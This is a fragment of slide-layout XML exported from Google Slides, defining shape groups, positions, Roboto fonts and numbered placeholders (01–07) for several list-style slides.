                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1490" name="Google Shape;1490;p118"/>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1" name="Google Shape;1491;p118"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5333713"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1492" name="Google Shape;1492;p118"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1493" name="Google Shape;1493;p118"/>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4" name="Google Shape;1494;p118"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="7180979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1495" name="Google Shape;1495;p118"/>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1496" name="Google Shape;1496;p118"/>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7" name="Google Shape;1497;p118"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="9040979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1498" name="Google Shape;1498;p118"/>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1499" name="Google Shape;1499;p118"/>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0" name="Google Shape;1500;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-200" y="3518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01" name="Google Shape;1501;p11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1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1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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32458" y="5346533"/>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05" name="Google Shape;1505;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="71873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06" name="Google Shape;1506;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="90281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507" name="Google Shape;1507;p118"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1251686" y="10888246"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1508" name="Google Shape;1508;p118"/>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1509" name="Google Shape;1509;p118"/>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0" name="Google Shape;1510;p11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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10875467"/>
            <a:ext cx="24443101"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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1513" name="Google Shape;1513;p119"/>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19"/>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15" name="Google Shape;1515;p119"/>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516" name="Google Shape;1516;p119"/>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517" name="Google Shape;1517;p11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18" name="Google Shape;1518;p119"/>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519" name="Google Shape;1519;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520" name="Google Shape;1520;p119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1521" name="Google Shape;1521;p11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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1522" name="Google Shape;1522;p11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3" name="Google Shape;1523;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="3399067"/>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24" name="Google Shape;1524;p119"/>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5" name="Google Shape;1525;p119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1526" name="Google Shape;1526;p11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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1527" name="Google Shape;1527;p11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8" name="Google Shape;1528;p119"/>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9" name="Google Shape;1529;p119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1530" name="Google Shape;1530;p11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1531" name="Google Shape;1531;p11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2" name="Google Shape;1532;p119"/>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3" name="Google Shape;1533;p119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1534" name="Google Shape;1534;p11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1535" name="Google Shape;1535;p11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6" name="Google Shape;1536;p119"/>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7" name="Google Shape;1537;p119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1538" name="Google Shape;1538;p11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1539" name="Google Shape;1539;p11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0" name="Google Shape;1540;p119"/>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1" name="Google Shape;1541;p119"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1542" name="Google Shape;1542;p119"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1543" name="Google Shape;1543;p119"/>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4" name="Google Shape;1544;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32192" y="4930267"/>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45" name="Google Shape;1545;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32192" y="6506467"/>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46" name="Google Shape;1546;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="80827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47" name="Google Shape;1547;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33258" y="9658900"/>
            <a:ext cx="243777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48" name="Google Shape;1548;p119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33258" y="11296333"/>
            <a:ext cx="243777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49"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1550" name="Google Shape;1550;p120"/>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20"/>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52" name="Google Shape;1552;p120"/>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553" name="Google Shape;1553;p120"/>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554" name="Google Shape;1554;p12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55" name="Google Shape;1555;p120"/>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556" name="Google Shape;1556;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557" name="Google Shape;1557;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1558" name="Google Shape;1558;p120"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1559" name="Google Shape;1559;p120"/>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0" name="Google Shape;1560;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="3399067"/>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61" name="Google Shape;1561;p120"/>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2" name="Google Shape;1562;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1563" name="Google Shape;1563;p120"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1564" name="Google Shape;1564;p120"/>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5" name="Google Shape;1565;p120"/>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6" name="Google Shape;1566;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1567" name="Google Shape;1567;p120"/>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1568" name="Google Shape;1568;p120"/>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9" name="Google Shape;1569;p120"/>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0" name="Google Shape;1570;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1571" name="Google Shape;1571;p120"/>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1572" name="Google Shape;1572;p120"/>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3" name="Google Shape;1573;p120"/>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4" name="Google Shape;1574;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1575" name="Google Shape;1575;p120"/>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1576" name="Google Shape;1576;p120"/>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7" name="Google Shape;1577;p120"/>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8" name="Google Shape;1578;p120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1579" name="Google Shape;1579;p120"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1580" name="Google Shape;1580;p120"/>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1" name="Google Shape;1581;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="49568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82" name="Google Shape;1582;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32658" y="6506467"/>
            <a:ext cx="243777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83" name="Google Shape;1583;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="80827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84" name="Google Shape;1584;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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85" name="Google Shape;1585;p120"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="11296333"/>
            <a:ext cx="24443101"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86"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1587" name="Google Shape;1587;p121"/>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21"/>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89" name="Google Shape;1589;p121"/>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590" name="Google Shape;1590;p121"/>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591" name="Google Shape;1591;p12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92" name="Google Shape;1592;p121"/>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593" name="Google Shape;1593;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594" name="Google Shape;1594;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="3066140"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1595" name="Google Shape;1595;p12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01</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1596" name="Google Shape;1596;p12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7" name="Google Shape;1597;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3134200"/>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98" name="Google Shape;1598;p121"/>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99" name="Google Shape;1599;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="4459807"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1600" name="Google Shape;1600;p12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02</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1601" name="Google Shape;1601;p12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2" name="Google Shape;1602;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333" y="4527867"/>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03" name="Google Shape;1603;p121"/>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4" name="Google Shape;1604;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="5854874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1605" name="Google Shape;1605;p12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03</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1606" name="Google Shape;1606;p12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7" name="Google Shape;1607;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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08" name="Google Shape;1608;p121"/>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9" name="Google Shape;1609;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="7248540"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1610" name="Google Shape;1610;p12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04</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1611" name="Google Shape;1611;p12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2" name="Google Shape;1612;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-333" y="7316600"/>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13" name="Google Shape;1613;p121"/>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4" name="Google Shape;1614;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="8642207"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1615" name="Google Shape;1615;p12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05</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1616" name="Google Shape;1616;p12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7" name="Google Shape;1617;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="8710267"/>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18" name="Google Shape;1618;p121"/>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9" name="Google Shape;1619;p121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="10035874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1620" name="Google Shape;1620;p12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06</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1621" name="Google Shape;1621;p12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2" name="Google Shape;1622;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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23" name="Google Shape;1623;p121"/>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121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="11497607"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1625" name="Google Shape;1625;p12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07</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1626" name="Google Shape;1626;p12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7" name="Google Shape;1627;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="11565667"/>
            <a:ext cx="23646599"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28"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1629" name="Google Shape;1629;p122"/>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30" name="Google Shape;1630;p122"/>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631" name="Google Shape;1631;p122"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
